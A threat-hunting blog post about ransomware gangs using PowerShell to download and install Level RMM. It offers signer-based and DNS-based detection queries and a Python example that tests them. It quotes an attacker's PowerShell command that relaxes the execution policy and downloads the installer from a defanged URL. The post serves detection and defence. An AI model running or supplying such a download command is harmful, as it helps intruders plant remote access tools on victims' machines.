184. Ransomware Gangs Abuse PowerShell to Install Level RMM
Hello everyone!
RMMs. Yes, again. This one isn't new, but I don't see it covered often enough, so I decided to share some detection and hunting ideas for it. I'm talking about Level RMM.
According to this report, the adversary leveraged PowerShell to download the installer:
powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile;
The executable is signed by Level Software, Inc. Why not use the signer for detection?
event_type: "processcreatewin"
AND
proc_file_sig: "Level Software"
Another detection opportunity is searching for Level RMM-related domains:
event_type: "dnsreqwin"
AND
dns_rname: ("level.io" OR "rmm.dev")
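To show how the two hunting queries above behave against telemetry, here is an added example (my code, not part of the original post) that runs both rules over a handful of constructed events using the same field names (event_type, proc_file_sig, dns_rname). The DNS rule is slightly stricter than the raw query: it matches only the exact domain or a subdomain of it, so a lookalike such as "notlevel.io" does not fire.

```python
# Constructed sample events (not from the post) in the same field layout the
# two hunting queries use: event_type, proc_file_sig, dns_rname.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_sig": "Level Software, Inc.",
     "proc_file_name": "install_windows.exe", "host": "ws01"},
    {"event_type": "processcreatewin", "proc_file_sig": "Microsoft Windows",
     "proc_file_name": "notepad.exe", "host": "ws01"},
    {"event_type": "dnsreqwin", "dns_rname": "downloads.level.io", "host": "ws02"},
    {"event_type": "dnsreqwin", "dns_rname": "agent.rmm.dev", "host": "ws02"},
    {"event_type": "dnsreqwin", "dns_rname": "example.com", "host": "ws03"},
    {"event_type": "dnsreqwin", "dns_rname": "notlevel.io", "host": "ws03"},
]

# Domains from the second query in the post.
LEVEL_DOMAINS = ("level.io", "rmm.dev")


def is_level_signed_process(event):
    # Rule 1: process creation where the image signer is Level Software.
    return (event.get("event_type") == "processcreatewin"
            and "level software" in event.get("proc_file_sig", "").lower())


def is_level_domain_request(event):
    # Rule 2: DNS request for a Level RMM domain. Match on a label boundary
    # (exact domain or a subdomain) so "notlevel.io" does not trigger.
    if event.get("event_type") != "dnsreqwin":
        return False
    name = event.get("dns_rname", "").lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in LEVEL_DOMAINS)


def hunt(events):
    """Return (rule_name, host, matched_value) for every event hitting a rule."""
    hits = []
    for ev in events:
        if is_level_signed_process(ev):
            hits.append(("level_signed_process", ev.get("host"), ev["proc_file_sig"]))
        if is_level_domain_request(ev):
            hits.append(("level_domain_request", ev.get("host"), ev["dns_rname"]))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```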
See you tomorrow!